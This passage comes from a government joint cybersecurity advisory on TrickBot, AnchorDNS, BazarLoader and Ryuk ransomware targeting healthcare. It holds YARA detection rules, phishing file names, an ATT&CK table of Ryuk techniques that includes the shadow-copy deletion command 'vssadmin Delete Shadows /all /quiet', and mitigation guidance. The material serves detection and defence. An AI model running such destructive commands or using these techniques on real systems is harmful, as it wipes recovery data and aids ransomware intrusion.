48 8B 04 C2 48 85 C0 74 0B 48 8D 55 90 48 8B CE FF D0 8B C8}<br /> &nbsp;&nbsp;&nbsp; condition:<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; (uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550) and any of them<br /> }</div> <div class="special_container">rule anchor_dns_pdbs {<br /> &nbsp;&nbsp;&nbsp; meta:<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; description = "Rule to detect AnchorDNS samples based off partial PDB paths"<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; author = "NCSC"<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; hash1 = "f0e575475f33600aede6a1b9a5c14f671cb93b7b"<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; hash2 = "1304372bd4cdd877778621aea715f45face93d68"<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; hash3 = "e5dc7c8bfa285b61dda1618f0ade9c256be75d1a"<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; hash4 = "f96613ac6687f5dbbed13c727fa5d427e94d6128"<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; hash5 = "46750d34a3a11dd16727dc622d127717beda4fa2"<br /> &nbsp;&nbsp;&nbsp; strings:<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $ = ":\\MyProjects\\secondWork\\Anchor\\"&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $ = ":\\simsim\\anchorDNS"<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $ = ":\\[JOB]\\Anchor\\"<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $ = ":\\Anchor\\Win32\\Release\\Anchor_"<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $ = ":\\Users\\ProFi\\Desktop\\data\\Win32\\anchor"<br /> &nbsp;&nbsp;&nbsp; condition:<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; (uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550) and any of them<br /> }</div> <h4>BazarLoader/BazarBackdoor</h4> <p>Beginning in approximately early 2020, actors believed to be associated with TrickBot began using BazarLoader and BazarBackdoor to infect victim networks. The loader and backdoor work closely together to achieve infection and communicate with the same C2 infrastructure. 
Campaigns using Bazar represent a new technique for cybercriminals to infect and monetize networks and have increasingly led to the deployment of ransomware, including Ryuk. BazarLoader has become one of the most commonly used vectors for ransomware deployment.</p> <p>Deployment of the BazarLoader malware typically begins with a phishing email with the following characteristics:</p> <ul> <li>Phishing emails are typically delivered by commercial mass email delivery services. The email received by a victim contains a link to an actor-controlled Google Drive document or other free online file-hosting service, typically purporting to be a PDF file.</li> <li>This document usually references a failure to create a preview of the document and contains a link to a URL hosting a malware payload in the form of a misnamed or multiple-extension file.</li> <li>Emails can appear as routine, legitimate business correspondence about customer complaints, hiring decisions, or other important tasks that require the attention of the recipient.</li> <li>Some email communications have included the recipient’s name or employer name in the subject line and/or email body.</li> </ul> <p>Through phishing emails linking users to Google Documents, actors used the following file names to install BazarLoader:</p> <ul> <li><code>Report-Review26-10.exe</code></li> <li><code>Review_Report15-10.exe</code></li> <li><code>Document_Print.exe</code></li> <li><code>Report10-13.exe</code></li> <li><code>Text_Report.exe</code></li> </ul> <p>Bazar activity can be identified by searching the system startup folders and the Userinit values under the <code>HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon</code> registry key, for example:</p> <p><code>%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\adobe.lnk</code></p> <p>For a comprehensive list of indicators of compromise regarding BazarLoader and other malware, see <a href="https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html">https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html</a>.</p> <h4>Indicators</h4> <p>In addition to TrickBot and BazarLoader, threat actors are using malware such as KEGTAP, BEERBOT, SINGLEMALT, and others as they continue to change tactics, techniques, and procedures in their highly dynamic campaign. 
The following C2 servers are known to be associated with this malicious activity.</p> <h4>Ryuk Ransomware</h4> <p>Typically Ryuk has been deployed as a payload from banking Trojans such as TrickBot. (See the <a href="https://www.ncsc.gov.uk/news/ryuk-advisory">United Kingdom (UK) National Cyber Security Centre (NCSC) advisory, Ryuk Ransomware Targeting Organisations Globally</a>, on their ongoing investigation into global Ryuk ransomware campaigns and associated Emotet and TrickBot malware.) Ryuk first appeared in August 2018 as a derivative of Hermes 2.1 ransomware, which first emerged in late 2017 and was available for sale on the open market as of August 2018. 
Ryuk still retains some aspects of the Hermes code. For example, all of the files encrypted by Ryuk contain the <code>HERMES</code> tag, but in some infections the files have <code>.ryk</code> added to the filename, while in others they do not. In other parts of the ransomware code, Ryuk has removed or replaced features of Hermes, such as the restriction against targeting specific Eurasia-based systems.</p> <p>While navigating the victim network, Ryuk actors will commonly use commercial off-the-shelf products—such as Cobalt Strike and PowerShell Empire—in order to steal credentials. Both frameworks are very robust and are highly effective dual-purpose tools, allowing actors to dump clear-text passwords or hash values from memory with the use of Mimikatz. This also allows the actors to inject a malicious dynamic-link library into memory with read, write, and execute permissions. In order to maintain persistence in the victim environment, Ryuk actors have been known to use scheduled tasks and service creation.</p> <p>Ryuk actors will quickly map the network in order to enumerate the environment and understand the scope of the infection. In order to limit suspicious activity and possible detection, the actors choose to live off the land and, if possible, use native tools—such as <code>net view</code>, <code>net computers</code>, and <code>ping</code>—to locate mapped network shares, domain controllers, and Active Directory. In order to move laterally throughout the network, the group relies on native tools, such as PowerShell, Windows Management Instrumentation (WMI), Windows Remote Management, and Remote Desktop Protocol (RDP). The group also uses third-party tools, such as BloodHound.</p> <p>Once dropped, Ryuk uses AES-256 to encrypt files and an RSA public key to encrypt the AES key. 
The Ryuk dropper drops a <code>.bat</code> file that attempts to delete all backup files and Volume Shadow Copies (automatic backup snapshots made by Windows), preventing the victim from recovering encrypted files without the decryption program.</p> <p>In addition, the attackers will attempt to shut down or uninstall security applications on the victim systems that might prevent the ransomware from executing. Normally this is done via a script, but if that fails, the attackers are capable of manually removing the applications that could stop the attack. The <code>RyukReadMe</code> file placed on the system after encryption provides one or two email addresses, using the end-to-end encrypted email provider Protonmail, through which the victim can contact the attacker(s). While earlier versions provided a ransom amount in the initial notification, Ryuk actors now specify a ransom amount only after the victim makes contact.</p> <p>The victim is told how much to pay to a specified Bitcoin wallet for the decryptor and is provided a sample decryption of two files.</p> <p>Initial testing indicates that the <code>RyukReadMe</code> file does not need to be present for the decryption script to run successfully, but other reporting advises that some files will not decrypt properly without it. Even if run correctly, there is no guarantee the decryptor will be effective. This is further complicated because the <code>RyukReadMe</code> file is deleted when the script is finished. 
This may affect the decryption script unless the file is saved to a different location before the script is run.</p> <p>According to MITRE, <a href="https://attack.mitre.org/versions/v7/software/S0446/">Ryuk</a> uses the ATT&amp;CK techniques listed in Table 1.</p> <p class="text-align-center"><em>Table 1: Ryuk ATT&amp;CK techniques</em></p> <table border="1" cellpadding="1" cellspacing="1" class="general-table" style="width: 881.46px; height: 312px; margin-right: auto; margin-left: auto;"> <thead> <tr> <th scope="col" style="width: 198px;"><strong>Technique</strong></th> <th scope="col" style="width: 356px;"><strong>Use</strong></th> </tr> </thead> <tbody> <tr> <td scope="col" style="width: 198px; text-align: left;">System Network Configuration Discovery [<a href="https://attack.mitre.org/versions/v7/techniques/T1016/">T1016</a>]</td> <td scope="col" style="width: 356px; text-align: left;">Ryuk has called <code>GetIpNetTable</code> in an attempt to identify all mounted drives and hosts that have Address Resolution Protocol entries.</td> </tr> <tr> <td scope="col" style="width: 198px; text-align: left;"> <p>Masquerading: Match Legitimate Name or Location [<a href="https://attack.mitre.org/versions/v7/techniques/T1036/005/">T1036.005</a>]</p> </td> <td scope="col" style="width: 356px; text-align: left;">Ryuk has constructed legitimate-appearing installation folder paths by calling <code>GetWindowsDirectoryW</code> and then inserting a null byte at the fourth character of the path. 
For Windows Vista or higher, the path would appear as <code>C:\Users\Public</code>.&nbsp;</td> </tr> <tr> <td scope="col" style="width: 198px; text-align: left;">Process Injection [<a href="https://attack.mitre.org/versions/v7/techniques/T1055/">T1055</a>]</td> <td scope="col" style="width: 356px; text-align: left;">Ryuk has injected itself into remote processes to encrypt files using a combination of <code>VirtualAlloc</code>, <code>WriteProcessMemory</code>, and <code>CreateRemoteThread</code>.&nbsp;</td> </tr> <tr> <td scope="col" style="width: 198px; text-align: left;">Process Discovery [<a href="https://attack.mitre.org/versions/v7/techniques/T1057/">T1057</a>]</td> <td scope="col" style="width: 356px; text-align: left;">Ryuk has called <code>CreateToolhelp32Snapshot</code> to enumerate all running processes.&nbsp;</td> </tr> <tr> <td scope="col" style="width: 198px; text-align: left;">Command and Scripting Interpreter: Windows Command Shell [<a href="https://attack.mitre.org/versions/v7/techniques/T1059/003/">T1059.003</a>]</td> <td scope="col" style="width: 356px; text-align: left;">Ryuk has used <code>cmd.exe</code> to create a Registry entry to establish persistence.&nbsp;</td> </tr> <tr> <td scope="col" style="width: 198px; text-align: left;">File and Directory Discovery [<a href="https://attack.mitre.org/versions/v7/techniques/T1083/">T1083</a>]</td> <td scope="col" style="width: 356px; text-align: left;">Ryuk has called <code>GetLogicalDrives</code> to enumerate all mounted drives, and <code>GetDriveTypeW</code> to determine the drive type.</td> </tr> <tr> <td scope="col" style="width: 198px; text-align: left;">Native API [<a href="https://attack.mitre.org/versions/v7/techniques/T1106/">T1106</a>]</td> <td scope="col" style="width: 356px; text-align: left;">Ryuk has used multiple native APIs including <code>ShellExecuteW</code> to run executables;&nbsp;<code>GetWindowsDirectoryW</code> to create folders; and <code>VirtualAlloc</code>, 
<code>WriteProcessMemory</code>, and <code>CreateRemoteThread</code> for process injection.</td> </tr> <tr> <td scope="col" style="width: 198px; text-align: left;">Access Token Manipulation [<a href="https://attack.mitre.org/versions/v7/techniques/T1134/">T1134</a>]</td> <td scope="col" style="width: 356px; text-align: left;">Ryuk has attempted to adjust its token privileges to have the <code>SeDebugPrivilege</code>.</td> </tr> <tr> <td scope="col" style="width: 198px; text-align: left;">Data Encrypted for Impact [<a href="https://attack.mitre.org/versions/v7/techniques/T1486/">T1486</a>]</td> <td scope="col" style="width: 356px; text-align: left;">Ryuk has used a combination of symmetric and asymmetric encryption to encrypt files. Files have been encrypted with their own AES key and given a file extension of <code>.RYK</code>. Encrypted directories have had a ransom note of <code>RyukReadMe.txt</code> written to the directory.</td> </tr> <tr> <td scope="col" style="width: 198px; text-align: left;">Service Stop [<a href="https://attack.mitre.org/versions/v7/techniques/T1489/">T1489</a>]</td> <td scope="col" style="width: 356px; text-align: left;">Ryuk has called <code>kill.bat</code> for stopping services, disabling services, and killing processes.</td> </tr> <tr> <td scope="col" style="width: 198px; text-align: left;">Inhibit System Recovery [<a href="https://attack.mitre.org/versions/v7/techniques/T1490/">T1490</a>]</td> <td scope="col" style="width: 356px; text-align: left;">Ryuk has used <code>vssadmin Delete Shadows /all /quiet</code> to delete volume shadow copies and <code>vssadmin resize shadowstorage</code> to force deletion of shadow copies created by third-party applications.</td> </tr> <tr> <td scope="col" style="width: 198px; text-align: left;">Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder [<a href="https://attack.mitre.org/versions/v7/techniques/T1547/001/">T1547.001</a>]</td> <td scope="col" 
style="width: 356px; text-align: left;">Ryuk has used the Windows command line to create a Registry entry under <code>HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run</code> to establish persistence.</td> </tr> <tr> <td scope="col" style="width: 198px; text-align: left;">Impair Defenses: Disable or Modify Tools [<a href="https://attack.mitre.org/versions/v7/techniques/T1562/001/">T1562.001</a>]</td> <td scope="col" style="width: 356px; text-align: left;">Ryuk has stopped services related to anti-virus.</td> </tr> </tbody> </table> <h3>Mitigations</h3><p>For a downloadable copy of IOCs, see <a href="https://us-cert.cisa.gov/sites/default/files/publications/AA20-302A.stix.xml">AA20-302A.stix</a>. For additional IOCs detailing this activity, see <a href="https://gist.github.com/aaronst/6aa7f61246f53a8dd4befea86e832456">https://gist.github.com/aaronst/6aa7f61246f53a8dd4befea86e832456</a>.</p> <h4>Plans and Policies</h4> <p>CISA, FBI, and HHS encourage HPH Sector organizations to maintain business continuity plans—the practice of executing essential functions through emergencies (e.g., cyberattacks)—to minimize service interruptions. Without planning, provision, and implementation of continuity principles, organizations may be unable to continue operations. Evaluating continuity and capability will help identify continuity gaps. Through identifying and addressing these gaps, organizations can establish a viable continuity program that will help keep them functioning during cyberattacks or other emergencies. 
CISA, FBI, and HHS suggest HPH Sector organizations review or establish patching plans, security policies, user agreements, and business continuity plans to ensure they address current threats posed by malicious cyber actors.</p> <h4>Network Best Practices</h4> <ul> <li>Patch operating systems, software, and firmware as soon as manufacturers release updates.</li> <li>Check configurations for every operating system version for HPH organization-owned assets to prevent issues from arising that local users are unable to fix due to having local administration disabled.</li> <li>Regularly change passwords to network systems and accounts and avoid reusing passwords for different accounts.</li> <li>Use multi-factor authentication where possible.</li> <li>Disable unused remote access/Remote Desktop Protocol (RDP) ports and monitor remote access/RDP logs.</li> <li>Implement application and remote access allow listing to only allow systems to execute programs known and permitted by the established security policy.</li> <li>Audit user accounts with administrative privileges and configure access controls with least privilege in mind.</li> <li>Audit logs to ensure new accounts are legitimate.</li> <li>Scan for open or listening ports and mediate those that are not needed.</li> <li>Identify critical assets such as patient database servers, medical records, and telehealth and telework infrastructure; create backups of these systems and house the backups offline from the network.</li> <li>Implement network segmentation. Sensitive data should not reside on the same server and network segment as the email environment.</li> <li>Set antivirus and anti-malware solutions to automatically update; conduct regular scans.</li> </ul> <h4>Ransomware Best Practices</h4> <p>CISA, FBI and HHS do not recommend paying ransoms. Payment does not guarantee files will be recovered. 
It may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. In addition to implementing the above network best practices, the FBI, CISA and HHS also recommend the following:</p> <ul> <li>Regularly back up data, air gap, and password protect backup copies offline.</li> <li>Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, secure location.</li> </ul> <h4>User Awareness Best Practices</h4> <ul> <li>Focus on awareness and training. Because end users are targeted, make employees and stakeholders aware of the threats—such as ransomware and phishing scams—and how they are delivered. Additionally, provide users training on information security principles and techniques as well as overall emerging cybersecurity risks and vulnerabilities.</li> <li>Ensure that employees know who to contact when they see suspicious activity or when they believe they have been a victim of a cyberattack. This will ensure that the proper established mitigation strategy can be employed quickly and efficiently.</li> </ul> <h4>Recommended Mitigation Measures</h4> <p>System administrators who have indicators of a TrickBot network compromise should immediately take steps to back up and secure sensitive or proprietary data. TrickBot infections may be indicators of an imminent ransomware attack; system administrators should take steps to secure network devices accordingly. 
Upon evidence of a TrickBot infection, review DNS logs and use the <code>XOR</code> key of <code>0xB9</code> to decode <code>XOR</code> encoded DNS requests to reveal the presence of <code>Anchor_DNS</code>, and maintain and provide relevant logs.</p> <h3>GENERAL RANSOMWARE MITIGATIONS — HPH SECTOR</h3> <p>This section is based on CISA and Multi-State Information Sharing and Analysis Center (MS-ISAC)'s Joint Ransomware Guide, which can be found at <a href="https://www.cisa.gov/publication/ransomware-guide">https://www.cisa.gov/publication/ransomware-guide</a>.</p> <p>CISA, FBI, and HHS recommend that healthcare organizations implement both ransomware prevention and ransomware response measures immediately.</p> <h4>Ransomware Prevention</h4> <h4><em>Join and Engage with Cybersecurity Organizations</em></h4> <p>CISA, FBI, and HHS recommend that healthcare organizations take the following initial steps:</p> <ul> <li>Join a healthcare information sharing organization, H-ISAC: <ul> <li>Health Information Sharing and Analysis Center (H-ISAC): <a href="https://h-isac.org/membership-account/join-h-isac/">https://h-isac.org/membership-account/join-h-isac/</a></li> <li>Sector-based ISACs - National Council of ISACs: <a href="https://www.nationalisacs.org/member-isacs">https://www.nationalisacs.org/member-isacs</a></li> <li>Information Sharing and Analysis Organization (ISAO) Standards Organization: <a href="https://www.isao.org/information-sharing-groups/">https://www.isao.org/information-sharing-groups/</a></li> </ul> </li> <li>Engage with CISA and FBI, as well as HHS—through the HHS Health Sector Cybersecurity Coordination Center (HC3)—to build a lasting partnership and collaborate on information sharing, best practices, assessments, and exercises. 
<ul> <li>CISA: <a href="https://www.cisa.gov">cisa.gov</a>, <a href="https://us-cert.cisa.gov/mailing-lists-and-feeds">https://us-cert.cisa.gov/mailing-lists-and-feeds</a>, <a href="mailto:central@cisa.gov">central@cisa.gov</a></li> <li>FBI: <a href="https://www.ic3.gov">ic3.gov</a>, <a href="https://www.fbi.gov/contact-us/field">www.fbi.gov/contact-us/field</a>, <a href="mailto:CyWatch@fbi.gov">CyWatch@fbi.gov</a></li> <li>HHS/HC3: <a href="http://www.hhs.gov/hc3">http://www.hhs.gov/hc3</a>, <a href="mailto:HC3@HHS.gov">HC3@HHS.gov</a></li> </ul> </li> </ul> <p>Engaging with the H-ISAC, ISAO, CISA, FBI, and HHS/HC3 will enable your organization to receive critical information and access to services to better manage the risk posed by ransomware and other cyber threats.</p> <h4><em>Follow Ransomware Best Practices</em></h4> <p>Refer to the best practices and references below to help manage the risk posed by ransomware and support your organization’s coordinated and efficient response to a ransomware incident. Apply these practices to the greatest extent possible based on availability of organizational resources.</p> <ul> <li>It is critical to maintain offline, encrypted backups of data and to regularly test your backups. Backup procedures should be conducted on a regular basis. It is important that backups be maintained offline or in separated networks as many ransomware variants attempt to find and delete any accessible backups. Maintaining offline, current backups is most critical because there is no need to pay a ransom for data that is readily accessible to your organization. <ul> <li>Use the 3-2-1 rule as a guideline for backup practices. 
The rule states that three copies of all critical data are retained on at least two different types of media and at least one of them is stored offline.</li> <li>Maintain regularly updated “gold images” of critical systems in the event they need to be rebuilt. This entails maintaining image “templates” that include a preconfigured operating system (OS) and associated software applications that can be quickly deployed to rebuild a system, such as a virtual machine or server.</li> <li>Retain backup hardware to rebuild systems in the event rebuilding the primary system is not preferred. <ul> <li>Hardware that is newer or older than the primary system can present installation or compatibility hurdles when rebuilding from images.</li> <li>Ensure all backup hardware is properly patched.</li> </ul> </li> </ul> </li> <li>In addition to system images, applicable source code or executables should be available (stored with backups, escrowed, license agreement to obtain, etc.). It is more efficient to rebuild from system images, but some images will not install on different hardware or platforms correctly; having separate access to needed software will help in these cases.</li> <li>Create, maintain, and exercise a basic cyber incident response plan and associated communications plan that includes response and notification procedures for a ransomware incident. 
<ul> <li>Review available incident response guidance, such as CISA’s Technical Approaches to Uncovering and Remediating Malicious Activity <a href="https://us-cert.cisa.gov/ncas/alerts/aa20-245a">https://us-cert.cisa.gov/ncas/alerts/aa20-245a</a>.</li> </ul> </li> <li>Help your organization better organize around cyber incident response.</li> <li>Develop a cyber incident response plan.</li> <li>The Ransomware Response Checklist, available in the <a href="https://www.cisa.gov/publication/ransomware-guide">CISA and MS-ISAC Joint Ransomware Guide</a>, serves as an adaptable, ransomware-specific annex to organizational cyber incident response or disruption plans.</li> <li>Review and implement as applicable MITRE’s Medical Device Cybersecurity: Regional Incident Preparedness and Response Playbook (<a href="https://www.mitre.org/sites/default/files/publications/pr-18-1550-Medical-Device-Cybersecurity-Playbook.pdf">https://www.mitre.org/sites/default/files/publications/pr-18-1550-Medical-Device-Cybersecurity-Playbook.pdf</a>).</li> <li>Develop a risk management plan that maps critical health services and care to the necessary information systems; this will ensure that the incident response plan will contain the proper triage procedures.</li> <li>Plan for the possibility of critical information systems being inaccessible for an extended period of time. This should include but not be limited to the following: <ul> <li>Print and properly store/protect hard copies of digital information that would be required for critical patient healthcare.</li> <li>Plan for and periodically train staff to handle the re-routing of incoming/existing patients in an expedient manner if information systems were to abruptly and unexpectedly become unavailable.</li> <li>Coordinate the potential for surge support with other healthcare facilities in the greater local area. 
This should include organizational leadership periodically meeting and collaborating with counterparts in the greater local area to create/update plans for their facilities to both abruptly send and receive a significant amount of critical patients for immediate care. This may include the opportunity to re-route healthcare employees (and possibly some equipment) to provide care along with additional patients.</li> </ul> </li> <li>Consider the development of a second, air-gapped communications network that can provide a minimum standard of backup support for hospital operations if the primary network becomes unavailable if/when needed.</li> <li>Predefine network segments, IT capabilities and other functionality that can either be quickly separated from the greater network or shut down entirely without impacting operations of the rest of the IT infrastructure.</li> <li>Legacy devices should be identified and inventoried with highest priority and given special consideration during a ransomware event.</li> <li>See <a href="https://www.cisa.gov/publication/ransomware-guide">CISA and MS-ISAC's Joint Ransomware Guide</a> for infection vectors including internet-facing vulnerabilities and misconfigurations; phishing; precursor malware infection; and third parties and managed service providers.</li> <li>HHS/HC3 tracks ransomware that is targeting the HPH Sector; this information can be found at <a href="http://www.hhs.gov/hc3">http://www.hhs.gov/hc3</a>.</li> </ul> <h4><em>Hardening Guidance</em></h4> <ul> <li>The Food and Drug Administration provides multiple guidance documents regarding the hardening of healthcare and specifically medical devices found here: <a href="https://www.fda.gov/medical-devices/digital-health-center-excellence/cybersecurity">https://www.fda.gov/medical-devices/digital-health-center-excellence/cybersecurity</a>.</li> <li>See <a href="https://www.cisa.gov/publication/ransomware-guide">CISA and MS-ISAC's Joint Ransomware Guide</a> for additional 
in-depth hardening guidance.</li> </ul> <h4><em>Contact CISA for These No-Cost Resources</em></h4> <ul> <li>Information sharing with CISA and MS-ISAC (for SLTT organizations) includes bi-directional sharing of best practices and network defense information regarding ransomware trends and variants as well as malware that is a precursor to ransomware.</li> <li>Policy-oriented or technical assessments help organizations understand how they can improve their defenses to avoid ransomware infection: <a href="https://www.cisa.gov/cyber-resource-hub">https://www.cisa.gov/cyber-resource-hub</a>. <ul> <li>Assessments include Vulnerability Scanning and Phishing Campaign Assessment.</li> </ul> </li> <li>Cyber exercises evaluate or help develop a cyber incident response plan in the context of a ransomware incident scenario.</li> <li>CISA Cybersecurity Advisors (CSAs) advise on best practices and connect you with CISA resources to manage cyber risk.</li> <li>Contacts: <ul> <li>SLTT organizations: <a href="mailto:CyberLiaison_SLTT@cisa.dhs.gov">CyberLiaison_SLTT@cisa.dhs.gov</a></li> <li>Private sector organizations: <a href="mailto:CyberLiaison_Industry@cisa.dhs.gov">CyberLiaison_Industry@cisa.dhs.gov</a></li> </ul> </li> </ul> <h4><em>Ransomware Quick References</em></h4> <ul> <li><em>Ransomware: What It Is and What to Do About It</em> (CISA): General ransomware guidance for organizational leadership and more in-depth information for CISOs and technical staff: <a href="https://www.us-cert.cisa.gov/sites/default/files/publications/Ransomware_Executive_One-Pager_and_Technical_Document-FINAL.pdf">https://www.us-cert.cisa.gov/sites/default/files/publications/Ransomware_Executive_One-Pager_and_Technical_Document-FINAL.pdf</a></li> <li>Ransomware (CISA): Introduction to ransomware, notable links to CISA products on protecting networks, specific ransomware threats, and other resources: <a 
href="https://www.us-cert.cisa.gov/Ransomware">https://www.us-cert.cisa.gov/Ransomware</a></li> <li>HHS/HC3: Ransomware that impacts HPH is tracked by the HC3 and can be found at <a href="https://www.hhs.gov/hc3">www.hhs.gov/hc3</a></li> <li><em>Security Primer – Ransomware</em> (MS-ISAC): Outlines opportunistic and strategic ransomware campaigns, common infection vectors, and best practice recommendations: <a href="https://www.cisecurity.org/white-papers/security-primer-ransomware/">https://www.cisecurity.org/white-papers/security-primer-ransomware/</a></li> <li><em>Ransomware: Facts, Threats, and Countermeasures</em> (MS-ISAC): Facts about ransomware, infection vectors, ransomware capabilities, and how to mitigate the risk of ransomware infection: <a href="https://www.cisecurity.org/blog/ransomware-facts-threats-and-countermeasures/">https://www.cisecurity.org/blog/ransomware-facts-threats-and-countermeasures/</a></li> <li>HHS Ransomware Fact Sheet: <a href="https://www.hhs.gov/sites/default/files/RansomwareFactSheet.pdf">https://www.hhs.gov/sites/default/files/RansomwareFactSheet.pdf</a></li> <li>NIST Securing Data Integrity White Paper: <a href="https://csrc.nist.gov/publications/detail/white-paper/2020/10/01/securing-data-integrity-against-ransomware-attacks/draft">https://csrc.nist.gov/publications/detail/white-paper/2020/10/01/securing-data-integrity-against-ransomware-attacks/draft</a></li> </ul> <h4>Ransomware Response Checklist</h4> <p><strong>Remember: Paying the ransom will not ensure your data is decrypted or that your systems or data will no longer be compromised. 
CISA, FBI, and HHS do not recommend paying ransom.</strong></p> <p>Should your organization be a victim of ransomware, CISA strongly recommends responding by using the Ransomware Response Checklist located in <a href="https://www.cisa.gov/publication/ransomware-guide">CISA and MS-ISAC's Joint Ransomware Guide</a>, which contains steps for detection and analysis as well as containment and eradication.</p> <h4><em>Consider the Need For Extended Identification or Analysis</em></h4> <p>If extended identification or analysis is needed, CISA, HHS/HC3, or federal law enforcement may be interested in any of the following information that your organization determines it can legally share:</p> <ul> <li>Recovered executable file</li> <li>Copies of the readme file – DO NOT REMOVE the file or decryption may not be possible</li> <li>Live memory (RAM) capture from systems with additional signs of compromise (use of exploit toolkits, RDP activity, additional files found locally)</li> <li>Images of infected systems with additional signs of compromise (use of exploit toolkits, RDP activity, additional files found locally)</li> <li>Malware samples</li> <li>Names of any other malware identified on your system</li> <li>Encrypted file samples</li> <li>Log files (Windows Event Logs from compromised systems, Firewall logs, etc.)</li> <li>Any PowerShell scripts found having executed on the systems</li> <li>Any user accounts created in Active Directory or machines added to the network during the exploitation</li> <li>Email addresses used by the attackers and any associated phishing emails</li> <li>A copy of the ransom note</li> <li>Ransom amount and whether or not the ransom was paid</li> <li>Bitcoin wallets used by the attackers</li> <li>Bitcoin wallets used to pay the ransom (if applicable)</li> <li>Copies of any communications with attackers</li> </ul> <p>Upon voluntary request, CISA can assist with analysis (e.g., phishing emails, storage media, logs, malware) at no cost to support your 
organization in understanding the root cause of an incident, even in the event additional remote assistance is not requested.</p> <ul> <li>CISA – Advanced Malware Analysis Center: <a href="https://www.malware.us-cert.gov/MalwareSubmission/pages/submission.jsf">https://www.malware.us-cert.gov/MalwareSubmission/pages/submission.jsf</a></li> <li>Remote Assistance – Request via <a href="mailto:Central@cisa.gov">Central@cisa.gov</a></li> </ul> <h3>Contact Information</h3><p>CISA, FBI, and HHS recommend identifying and having on hand the following contact information for ready use should your organization become a victim of a ransomware incident. Consider contacting these organizations for mitigation and response assistance or for purpose of notification.</p> <ul> <li>State and Local Response Contacts</li> <li>IT/IT Security Team – Centralized Cyber Incident Reporting</li> <li>State and Local Law Enforcement</li> <li>Fusion Center</li> <li>Managed/Security Service Providers</li> <li>Cyber Insurance</li> </ul> <p>To report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at <a href="https://www.fbi.gov/contact-us/field-offices">www.fbi.gov/contact-us/field</a>, or the FBI’s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by email at <a href="mailto:CyWatch@fbi.gov">CyWatch@fbi.gov</a>. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. 
To request incident response resources or technical assistance related to these threats, contact CISA at <a href="mailto:Central@cisa.gov">Central@cisa.gov</a>.</p> <p>Additionally, see <a href="https://www.cisa.gov/publication/ransomware-guide">CISA and MS-ISAC's Joint Ransomware Guide</a> for information on contacting—and what to expect from contacting—federal asset response and federal threat response contacts.</p> <h3><em>Disclaimer</em></h3> <p>This document is marked TLP:WHITE. Disclosure is not limited. Sources may use TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the Traffic Light Protocol, see <a href="https://cisa.gov/tlp">https://cisa.gov/tlp</a>.</p> <h3>References</h3> <ul> <li><a href="https://www.cisa.gov/emergency-services-sector-continuity-planning-suite">CISA Emergency Services Sector Continuity Planning Suite </a></li> <li><a href="https://www.cisa.gov/publication/ransomware-guide">CISA MS-ISAC Joint Ransomware Guide</a></li> <li><a href="https://us-cert.cisa.gov/ncas/tips/ST04-014">CISA Tip: Avoiding Social Engineering and Phishing Attacks</a></li> <li><a href="https://www.ic3.gov/media/2019/191002.aspx">FBI PSA: “High-Impact Ransomware Attacks Threaten U.S. 
Businesses and Organizations"</a></li> <li><a href="https://healthsectorcouncil.org/hic-tcr/">Health Industry Cybersecurity Tactical Crisis Response</a></li> <li><a href="http://www.phe.gov/405d">Health Industry Cybersecurity Practices (HICP) </a></li> <li><a href="https://protect2.fireeye.com/url?k=661c55bd-3a495cae-661c6482-0cc47adb5650-bb09b09e1017f10b&u=https://phe.us4.list-manage.com/track/click?u=f758a61addf9399176e6a0c3a&id=99373fd9c7&e=7882426b51">HHS - Ransomware Spotlight Webinar </a></li> <li><a href="https://protect2.fireeye.com/url?k=b43c8fe1-e86986f2-b43cbede-0cc47adb5650-84218742b50e2b7e&u=https://phe.us4.list-manage.com/track/click?u=f758a61addf9399176e6a0c3a&id=3d453bb6fe&e=7882426b51">HHS - Health Industry Cybersecurity Practices: Managing Threats and Protecting Patients</a></li> <li><a href="https://protect2.fireeye.com/url?k=6a477b44-36127257-6a474a7b-0cc47adb5650-f6c92a4c247070ec&u=https://phe.us4.list-manage.com/track/click?u=f758a61addf9399176e6a0c3a&id=071616ff3e&e=7882426b51">HHS - Ransomware Briefing </a></li> <li><a href="https://protect2.fireeye.com/url?k=fe80c15e-a2d5c84d-fe80f061-0cc47adb5650-2206dbc55c13f1de&u=https://phe.us4.list-manage.com/track/click?u=f758a61addf9399176e6a0c3a&id=ebb762e019&e=7882426b51">HHS - Aggressive 